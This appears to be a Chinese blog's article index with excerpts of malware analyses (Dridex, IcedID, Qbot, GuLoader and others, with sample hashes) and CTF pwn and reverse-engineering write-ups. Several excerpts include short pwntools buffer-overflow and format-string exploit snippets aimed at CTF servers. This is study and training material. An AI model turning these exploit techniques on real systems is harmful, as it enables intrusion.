自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(61)
  • 收藏
  • 关注

原创 Dridex样本分析

Dridex分析报告基本信息样本名称INV_984748.xls样本类型excel恶意类型蠕虫远控SHA2567F8F24884E26B4B508D5147F8F54269E452D1200904323544EF36E30400190B1样本名称t9ak0.dllSHA256076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab主要执行流程excel打开启动

2020-10-07 00:42:52 611

原创 羊城杯-RE

loginpyinstaller打包,用工具解一下,得到login.pyc修复一下文件头,反编译解方程组。from z3 import *s=Solver()code=[BitVec(('x%d'%i),32) for i in range(14)]a1 = code[2]a2 = code[1]a3 = code[0]a4 = code[3]a5 = code[4]a6 = code[5]a7 = code[6]a8 = code[7]a9 = code[9]a10 = co

2020-09-12 20:15:42 140 2

原创 ICEID

文章目录基本信息样本基本信息主要执行流程office宏pfsdnskdf.exe解密exe傀儡进程关键技术概览1.时间差检测2.cpuid3.隐写术4.傀儡进程5.浏览器注入6.流量混淆详细分析宏代码部分PFSDNSKDF.EXE微步云在线分析手动分析PFSDNSKDF.EXE下载解密文件分析微步云在线分析手动分析新shellcode傀儡进程火绒剑分析开启监听端口生成自签名证书对谷歌浏览器执行远线程注入手动分析其他参考链接基本信息样本基本信息文件名称fram.doc样本类型doc

2020-08-31 20:32:57 64

原创 Zloader分析

文章目录Zloader分析报告基本信息样本基本信息主要执行流程关键技术概览详细分析工具静态分析动态调试分析Zloader分析报告基本信息样本基本信息名称order_93.xls样本类型xls恶意类型加载器样本MD5ea2a84383a2ef3bdcea801e0f22a0072样本SHA1f74d0b4ac53ac4a9d898a77fb050328495b971f3主要执行流程样本启用excel4.0宏,进行一系列反沙箱行为之后,创建vbs下载

2020-08-31 19:44:59 68

原创 QBOT分析

QBOT分析报告文章目录QBOT分析报告基本信息主要执行流程关键技术概览反沙箱傀儡进程DLL详细分析vbs分析新vbs分析DLL分析新exe傀儡进程参考资料基本信息样本名称qakbot样本类型vbs恶意类型蠕虫远控样本MD52a4a6cc8bd52f618a0190a8529c82b7d样本SHA1ef3d638377e245d7f388b41aad5e3525a8ccd2ed主要执行流程样本是一封钓鱼邮件,下载文件是一个VBS文件,VBS开启了严

2020-08-31 19:28:38 144

原创 ursnif分析

ursnif文章目录ursnif基本信息主要执行流程关键技术概览详细分析docexe网络连接动态调试基本信息样本名称5f894602e88263e34dcdbb2eb2da3078.doc样本类型doc恶意类型蠕虫远控MD5cc7ceb281d0780a1514f99a635ca35e4SHA2563122695bb31fa85dc8ff21b6f5f2ded5a1f306ea2520edafd44a653b2d277eef主要执行流程程序启动do

2020-08-31 19:20:22 91

原创 GuLoader分析报告

GuLoader分析报告文章目录GuLoader分析报告基本信息样本基本信息主要执行流程关键技术概览反虚拟机1.内存遍历检测字符串2.qemu-ga.exe3.窗口数量检测反逆向分析1.花指令2.反调试DLL函数加载反HOOK1.检测一2.检测二3.检测三4,检测四傀儡进程加密特征详细分析加载器部分傀儡进程部分行为检测修复HOOK&HOOK检测概述可行性窗口数检测概述可行性傀儡进程检测概述可行性qemu-ga.exe检测概述可行性反调试检测ZwSetInformationThread概述可行性pa

2020-06-23 13:28:11 180

原创 instr.scr样本分析

instr.scr样本分析报告文章目录instr.scr样本分析报告基本信息主要执行流程关键技术概览反沙箱详细分析instr.scrservices.exe参考链接基本信息主要执行流程instr.scr加了upx壳进行自我复制改名为java.exe,并设置自启动,且获取通讯录进行邮件传发送播自身。instr.scr同时会释放services.exe同样加了upx壳,设置自启动,且将自身作为服务端与外界进行通讯实现远控。关键技术概览反沙箱程序创建java.exe,删除,再将自身拷贝为java

2020-06-23 13:19:53 71

原创 进程创建期修改PE输入表法注入

进程创建期修改PE输入表法注入程序定义CImage类内部包含了一些有关PE结构的变量和一些函数函数列表如下findImagebase()AttachToProcess()InitializePEHeaders()AddNewSectionToMemory()LocateSectionByRVA()ALIGN_SIZE_UPALIGN_SIZE_UP(Size,Alignment...

2020-03-29 20:52:15 140

原创 BUU刷题(三)

BUU刷题(三)fmfrom pwn import *context.log_level='debug'p=process('./fm')p=remote("node3.buuoj.cn","27782")payload=p32(0x0804a02c)+'%11$n'p.sendline(payload)p.interactive()others_shellcode拿到题目直...

2020-03-13 22:10:19 489

原创 IAT结构分析
原力计划

IAT结构分析IAT介绍解决兼容问题(不同机器的dll版本不同,地址自然不同),操作系统就必须提供一些措施来确保可以在其他版本的Windows操作系统,以及DLL版本下也能正常运行。这时IAT(Import Address Table:输入函数地址表)就应运而生了。IAT定位手工寻找利用PEview找到程序的NT头的可选头内有个import table此处记录了其RVA。根据结构体...

2020-03-13 22:08:44 138

原创 office-栈溢出漏洞简单汇总

CVE-2017-1182关键词:rtf,公式编辑器,拷贝未检测长度,ACTIVEX控件解析漏洞原理:在读入公式的Font Name数据时,在将Name拷贝到一个函数内局部变量的时候没有对Name的长度做校验,从而造成栈缓冲区溢出漏洞函数:漏洞存在于EQNEDT21.EXE公式编辑器的sub_41160F函数中,我们将其拖进IDA,找到漏洞点,可以看到伪代码如下,这里没有对长度进行检验...

2020-02-07 19:07:30 256

原创 BUU PWN (二)

BUU PWN (二)level0from pwn import *#p=process('./level0')p=remote("node3.buuoj.cn","26684")p.recvline()payload='a'*0x80+'a'*8+p64(0x400596)p.sendline(payload)p.interactive()ciscn_2019_n_5ret...

2020-02-07 15:29:49 450

原创 BUU PWN(一)

test_your_nc连上即可拿到shellripfrom pwn import *context.log_level='debug'#p=process('./17pwn1')p=remote("node3.buuoj.cn","26137")p.recvuntil("please input\n")payload='a'*0xf+'a'*8+p64(0x401186)p.s...

2020-01-28 20:37:49 888

原创 ichunqiu圣诞欢乐赛babyre

ichunqiu圣诞欢乐赛babyre程序关键函数在此此处是一些有关于多线程的函数,正好借此机会学习一下,顺便学习了一下多线程调试文章如下https://bbs.pediy.com/thread-254194.htm多线程CreateThread函数为创建线程,创建线程成功即运行这个线程。其中第三个参数为指向线程函数的指针第四个参数为向线程函数传递的参数WaitForSingle...

2020-01-06 15:12:46 67

原创 internal chat圣诞欢乐赛

internal chat拿到题目开启的保护为很容易联想到覆写got表来getshell首先给注册一个用户,用户的结构体如下struct user{ char *user_name; __int64 age; char description[0x100]; _QWORD *addr; _QWORD *friend_addr; __in...

2020-01-05 15:56:59 47

原创 frame faking

int __cdecl main(int argc, const char **argv, const char **envp){ char buf; // [rsp+0h] [rbp-40h] setbuf(stdin, 0LL); setbuf(_bss_start, 0LL); setbuf(stderr, 0LL); puts("Input Your Name:"...

2020-01-05 15:56:18 157 2

原创 巅峰极客snote

巅峰极客snote链接:https://pan.baidu.com/s/1aAb4JjplV-MBj8iQCauI2Q提取码:977o复制这段内容后打开百度网盘手机App,操作更方便哦查看保护&大致逻辑是一个选单程序,且保护全开功能分析1.add2.showdword_202014为1,只能泄露一次3.deletedword_202010只能free一次,且...

2019-11-09 01:23:24 183

原创 RC4变种算法分析

RC4算法分析及其变种链接:https://pan.baidu.com/s/1IBKy1mYugLxsoupbMGeXnA提取码:4b1b复制这段内容后打开百度网盘手机App,操作更方便哦题目Main流程大致如下 sub_402690(*(_QWORD *)&argc, argv, envp); v10 = 'i esaelP'; v11 = 'eht tupn'; ...

2019-09-30 01:13:33 159

原创 CTF-wiki bin.exe 反调试练习

CTF-wiki bin.exe 反调试练习主函数大致逻辑如下:int __cdecl main(int argc, const char **argv, const char **envp){ FILE *v3; // eax HANDLE v4; // eax int v11; // [esp+C4h] [ebp-A8h] DWORD v12; // [esp+D4h] ...

2019-09-29 20:22:00 370

原创 BUGKU 代码审计练习

BUGKU 代码审计练习extract变量覆盖<?php$flag=flag.txt;extract($_GET);//数组键名作为变量名,使用数组键值作为变量值if(isset($shiyan))//检测变量是否为空{ $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{...

2019-08-30 16:16:20 175

原创 HACKNOTE-UAF&system函数调用

HACKNOTE-UAF&system函数调用是一个32位选单程序主功能和开启的保护如下首先看add_note 部分unsigned int add_note(){ _DWORD *v0; // ebx signed int i; // [esp+Ch] [ebp-1Ch] int size; // [esp+10h] [ebp-18h] char buf; //...

2019-08-21 16:25:39 96

原创 1000levels-vsyscall

1000levels-vsyscall题目是一个64位的程序 具体保护如下程序主要分为两部分,分别为go部分和hint部分。首先先看简单的hint部分int hint(){ signed __int64 v1; // [rsp+8h] [rbp-108h] int v2; // [rsp+10h] [rbp-100h] __int16 v3; // [rsp+14h] [r...

2019-08-11 02:50:59 126

原创 babyfengshui-堆溢出

babyfengshui-堆溢出题目是一个32位的选单式程序,大致功能和保护如下逐一分析各个功能,首先是Add_user部分 printf("size of description: "); __isoc99_scanf("%u%c", &v2, &v0); sub_8048816(v2);_DWORD *__cdecl sub_80...

2019-07-31 21:48:40 89

原创 RCTF babyre xxtea

xxtea程序是一个64位ELF程序发现里面包含了TEA相关的加密,调试程序可知输入的长度需要为16,且之后有3个关键的函数三个函数处理之后的结果与0x17异或之后,需要输出Bingo!第一个函数很简单是将我们输入的字符串变成HEX(测试字符1234567890123456)进入第二个函数,找到了第XXTEA的黄金比例(0x9e3779b9)首先排除TEA因为TEA加密没有拿黄...

2019-07-28 18:06:15 216

原创 C++栈溢出

c++栈溢出程序开启的保护如下程序在注册的地方存在着栈溢出漏洞v20 = __readfsqword(0x28u); std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(&v17); do { me...

2019-07-24 14:08:32 233

原创 AES CBC 逆向分析,异常处理,反调试

AES CBC 逆向分析,异常处理,反调试AES CBC拿到题目在IDA中看见了类似AES的图标放入PEID的KANAL插件查看找到了AES的S盒和BASE64的S盒,初步确定了内部的加密算法为AES和base64。来到关键函数4020D0处此处对输入字符串进行了加密。进入该函数输入字符串首先和sctfsctfsctfsctf进行了异或之后又于sycloversyclover进...

2019-07-23 13:15:47 206

原创 babyheap_fastbin_attack

babyheap-堆溢出之fastbin_attack首先检查程序保护保护全开。是一个选单系统分析程序void new(){ int index; // [rsp+0h] [rbp-10h] signed int size; // [rsp+4h] [rbp-Ch] void *ptr; // [rsp+8h] [rbp-8h] for ( index = 0; i...

2019-06-23 13:28:35 130

原创 格式化字符串在bss段上的处理

格式化字符串在bss段上的内容处理先查看程序保护,保护全开拿到程序一眼就看到了格式化字符串的漏洞int __cdecl main(int argc, const char **argv, const char **envp){ int v3; // eax char buf; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h]...

2019-06-19 21:53:37 1114 3

原创 格式化字符串漏洞-无限循环

格式化字符串漏洞-无限循环程序大致逻辑如下,程序存在system函数,保护只开了NX setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); puts("Welcome to my ctf! What's your name?"); __isoc99_scanf("%64s", &format); printf("Hello...

2019-06-16 15:13:49 798

原创 4-ReeHY-main-double_free

4-ReeHY-main-double_free拿到程序看一下保护和内容只开了NX保护是一个有关于堆的创建删除编辑的程序。拿到程序寻找漏洞点。首先进入create函数 int result; // eax char buf; // [rsp+0h] [rbp-90h] void *dest; // [rsp+80h] [rbp-10h] int v3; // [rsp+8...

2019-06-15 14:27:26 297

原创 time_formatter-UAF利用

time_formatter-UAF利用看一眼程序主逻辑__int64 __fastcall main(__int64 a1, char **a2, char **a3){ __gid_t v3; // eax FILE *v4; // rdi __int64 v5; // rdx int v6; // eax __int64 result; // rax v3 =...

2019-06-12 16:20:01 379 4

原创 有关沙盒逃逸的两道题目

有关沙盒逃逸的两道题目1.BCTF-2017 Monkey拿到题目给了一个js文件,是一个模拟终端的程序。输入os.system(’/bin/sh’),即可拿到shell.2.CUIT-2017这题就没上一题那么容易。输入os.system(’/bin/sh’)函数被检测出,应该是启用了字符串过滤''和.都被过滤,但是system没有过滤,此时我们可以使用getattr 来进行g...

2019-06-11 13:07:40 644

原创 string-64位格式化字符串漏洞

string-64位格式化字符串漏洞题目描述:一个很有趣的题目,题目背景是你遇到了一条龙,一位巫师可以帮助你逃离危险。首先跑一下程序看下程序逻辑。首先给你两个秘密地址,让你输入用户名之后,依照程序意图继续让你向东走,向东走之后看见一个洞。进入这个洞,让你输入一个地址,之后再输入你的愿望,看到了格式化字符串漏洞 puts("A voice heard in your mind"); p...

2019-06-09 15:07:25 1331 3

原创 cgfsb-格式化字符串

cgfsb-格式化字符串漏洞程序大致逻辑如下 v8 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); buf = 0; v5 = 0; v6 = 0; memset(&s, 0, 0x64u); puts("please tell me your...

2019-06-08 16:32:26 304

原创 xman-level5-mprotect利用

xman-level5题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题无法用system和execve函数,只能通过shellcode来进行getshell。但是开了NX保护。不可以执行shellcode但是题目给了提示使用mmap函数和mprotect。我们可以使用mprotect 函数,将bss段改为可...

2019-06-07 14:10:15 297 1

原创 bugku-pwn3

程序是一个保护全关的64位程序,主逻辑如下__int64 __fastcall main(__int64 a1, char **a2, char **a3){ char s; // [rsp+0h] [rbp-10h] memset(&s, 0, 0x10uLL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1...

2019-06-04 12:00:12 1343

原创 强网杯-Just RE-3DES逆向分析

强网杯just rez3求解题目流程很简单,查找字符串找到主函数int __cdecl main(int argc, const char **argv, const char **envp){ unsigned int *v3; // edi signed int v4; // eax _BYTE *v5; // edx int v6; // eax int resu...

2019-06-02 14:45:41 363 4

原创 HDCTF-mfc逆向之消息发送

拿到题目是一个mfc并且带有VMP壳。提示这里有一个key拿xspy扫一下发现了一个没有系统库名的OnMsg:0464,且数字比较特殊,发送一条有关该数字的消息#include <stdio.h>#include <stdlib.h>#include <Windows.h>int main(){ HWND h = ::FindWindowA...

2019-05-27 21:04:45 365

原创 HDCTF-easypyc-python文件格式

前记拿到题目是一个pyc文件,像往常一样,直接往Easy Python Decompiler里丢,但是却出现了文件头错误的信息。。放入winhex中改了文件头,再反编译没用。。。然后发现一些列东西与网上的pyc文件格式不同。。之后就改格式放入工具,改放入工具。重复了n次。。就放弃了这道题。解题过程赛后看了wp,才知道不同版本python格式还是不同的基本格式pyc 文件一般由 3 个部分...

2019-05-27 19:58:38 564

空空如也

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除